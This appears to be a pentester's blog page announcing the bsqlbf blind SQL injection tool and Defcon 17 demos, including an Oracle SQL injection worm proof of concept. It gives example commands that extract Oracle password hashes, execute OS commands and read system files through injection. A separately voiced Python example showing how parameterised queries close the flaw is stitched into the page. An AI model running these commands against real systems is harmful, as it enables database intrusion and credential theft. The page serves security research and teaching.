www.notsosecure.com

From Pentesters To Pentesters

Here are my slides and video demonstrations which I presented at Defcon 17.

There are 3 demos to go with the slides:

Demo 1: Exploiting PL/SQL Injection from Web Applications.

Demo 2: Exploiting SQL Injection in Oracle Applications with Bsqlbf

Demo 3: A proof of concept of Oracle SQL Injection Worm

Tools: There are 2 tools shown in the demos above:
1. Bsqlbf: Download from Project Homepage
2. OAP_Hacker.pl: Download Here

Enjoy!! :)

A new version of bsqlbf is now available. The following are the new additions:

-------------------
 -type:        Type of injection:

        3:      Type 3  is extracting data with DBA privileges
                 (e.g. Oracle password hashes from sys.user$)
        4:      Type 4 is O.S code execution(default: ping 127.0.0.1)
        5:      Type 5 is Reading O.S files(default: c:\boot.ini)
--------------------
Type 4 (O.S code execution) supports the following sub types:

 -stype:        How you want to execute command:

        0:      SType 0 (default) is based on java,
                universal but won't work against XE
        1:      SType 1 against oracle 9 with plsql_native_make_utility
        2:      SType 2 against oracle 10 with dbms_scheduler

-------------------
Examples:

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match "true" -sql "select password from sys.user$ where rownum=1"

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match "true" -file "C:\boot.ini"

-------------------
Download from Project Homepage: http://code.google.com/p/bsqlbf-v2/
-------------------

All these additions are based on the dbms_export_extension exploit. This will work against the following Oracle versions:
Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2, XE

-------------------
Enjoy…

I finally managed to fix a few bugs and release a new version. Other than the bug fixes, the new version also supports blind SQL injection in "order by" and "group by" clauses.

There are currently a few issues with threaded Perl. I have tested this under Windows using ActivePerl. As always, any bug report is highly appreciated.

Download link

Sid

Bsqlbf was originally written by A. Ramos from www.514.es and was intended to exploit blind SQL injection against a MySQL backend database. This is a modified version of the same tool. It supports blind SQL injection against the following databases:

MS-SQL

MY-SQL

PostgreSQL

Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other SQL injection tools is that it accepts custom SQL queries supplied with the -sql switch.

It supports 2 modes of attack (-type):

Type 0: Blind SQL Injection based on True and False responses

Type 1: Blind SQL Injection based on True And Error Response(details

Usage: $./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
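The two modes above exist only because the application's response changes with the truth value (Type 0) or the syntactic validity (Type 1) of whatever the request parameter appends to the statement. The following Python script is an added illustration, not code from bsqlbf or this site: it uses an in-memory SQLite database as a stand-in for the backends listed above, with a constructed products table, a concatenating lookup beside a parameterised one, and two checks that report whether each lookup still leaks a true/false or true/error signal. The table, rows, probe strings and function names are all assumptions made for this example.

```python
"""Why a boolean-based blind SQL injection oracle exists, and how a
parameterised query removes it. Added illustration using an in-memory
SQLite database as a stand-in for the backends bsqlbf targets; the table,
rows and probe strings are constructed for this example."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a product lookup like ?p=1 in the usage line."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, p: str) -> bool:
    """Concatenates the request parameter into the statement.
    Returns True when a row came back (the page would render the product),
    False otherwise: exactly the true/false signal a Type 0 scan reads."""
    sql = "SELECT name FROM products WHERE id = " + p
    return conn.execute(sql).fetchone() is not None


def safe_lookup(conn: sqlite3.Connection, p: str) -> bool:
    """Validates the parameter type and binds it as a value, so whatever
    is appended to the parameter is never parsed as SQL."""
    try:
        pid = int(p)
    except ValueError:
        return False  # reject anything that is not an integer id
    row = conn.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchone()
    return row is not None


def oracle_present(lookup) -> bool:
    """True if an appended condition changes the response, i.e. the lookup
    leaks the truth value of caller-supplied SQL (the Type 0 oracle)."""
    conn = make_db()
    # Constructed probes: same row id, opposite appended conditions.
    with_true = lookup(conn, "1 AND 1=1")
    with_false = lookup(conn, "1 AND 1=2")
    return with_true != with_false


def type1_error_differs(lookup) -> bool:
    """Type 1 reads a true/error difference instead. A syntactically
    broken probe raises from the concatenating lookup but is simply
    rejected by the hardened one."""
    conn = make_db()
    try:
        lookup(conn, "1 AND 1=")  # constructed malformed probe
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    print("concatenating lookup leaks true/false:", oracle_present(vulnerable_lookup))
    print("parameterised lookup leaks true/false:", oracle_present(safe_lookup))
    print("concatenating lookup errors on bad SQL:", type1_error_differs(vulnerable_lookup))
    print("parameterised lookup errors on bad SQL:", type1_error_differs(safe_lookup))
```

The hardened lookup returns the same "not found" answer for every non-integer value and never raises a database error that depends on the input, which is what closes both the Type 0 and the Type 1 channel; the same shape (type validation plus bound parameters) applies to the string-field case, where the bound value may contain quotes without ever reaching the SQL parser.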

Download: http://bsqlbf-v2.googlecode.com/files/bsqlbf-v2.1.zip

Send your feedback/suggestions to sid-at-notsosecure(dot)com

Although I don't have the habit of reading books, here are a few books which you may consider reading.

-------------------

The Database Hacker's Handbook (David Litchfield)

The Oracle Hacker's Handbook (David Litchfield)

Hacking Web Applications Exposed (TMH Publications)

Essential PHP Security (Chris Shiflett)

TCP/IP Illustrated (Comer).

Hacking Linux Exposed. 

-------------------

As this list is really small, it is clear that I need to read more books. If you know any good book related to pentesting (or security in general), please share it with us.